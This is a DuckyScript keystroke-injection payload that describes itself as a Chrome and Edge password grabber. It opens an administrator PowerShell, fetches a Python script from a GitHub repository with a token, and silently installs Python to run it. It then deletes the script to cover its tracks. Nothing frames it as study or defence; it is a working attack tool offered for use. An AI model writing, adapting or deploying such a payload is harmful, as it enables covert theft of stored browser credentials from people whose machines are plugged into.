REM Chrome and Edge browser pass grabber. 

REM Opens powershell in admin
DELAY 1000
GUI r
DELAY 1000
STRING powershell
DELAY 1000
CTRL SHIFT ENTER

REM downloads PassGrabV2.py to Desktop
DELAY 1000
STRING $token="GITHUB TOKEK HERE"; $desktop=Join-Path $env:USERPROFILE "Desktop"; Invoke-RestMethod -Headers @{Authorization="Bearer $token"; "User-Agent"="PowerShell"} -Uri "https://api.github.com/repos/USERNAME/REPONAME/contents/PassGrabV2.py" | ForEach-Object { [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($_.content)) } | Out-File (Join-Path $desktop "PassGrabV2.py") -Encoding utf8
DELAY 1000
ENTER

REM installs python 3.10.0
DELAY 1000
STRING Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.10.0/python-3.10.0-amd64.exe" -OutFile "$env:TEMP\python310.exe"; Start-Process -FilePath "$env:TEMP\python310.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
DELAY 1000
ENTER
DELAY 90000

REM runs PassGrabV2.py
STRING Set-Location -Path (Join-Path $env:USERPROFILE "Desktop")
DELAY 1000 
ENTER
DELAY 1000
STRING python PassGrabV2.py
DELAY 1000
ENTER

REM removed PassGrabV2.py and exits powershell
DELAY 15000
STRING Remove-Item -Path (Join-Path $env:USERPROFILE "Desktop\PassGrabV2.py") -Force
ENTER
DELAY 1000
STRING exit
DELAY 1000
ENTER